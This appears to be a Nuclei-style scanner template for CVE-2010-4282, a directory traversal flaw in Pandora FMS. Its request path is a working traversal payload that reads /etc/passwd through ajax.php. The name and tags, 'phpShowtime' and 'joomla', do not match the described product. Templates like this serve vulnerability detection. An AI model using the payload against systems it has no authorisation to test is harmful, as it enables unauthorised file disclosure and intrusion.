id: CVE-2010-4282 info: name: phpShowtime 2.0 - Directory Traversal author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15643 - https://nvd.nist.gov/vuln/detail/CVE-2010-4282 - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download - http://www.exploit-db.com/exploits/15643 - http://seclists.org/fulldisclosure/2010/Nov/326 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4282 cwe-id: CWE-22 epss-score: 0.01214 epss-percentile: 0.83707 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: artica product: pandora_fms tags: seclists,phpshowtime,edb,cve,cve2010,lfi,joomla http: - method: GET path: - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a0046304402206dcb43370de7f65225a6b2e21c3511b84661b511626d5f21a8e92213d2d70b5c0220367a86ae6d93a271645c641c4d356a4c4d846607dd8986348379904f8f22bc28:922c64590222798bb761d5b6d8e72950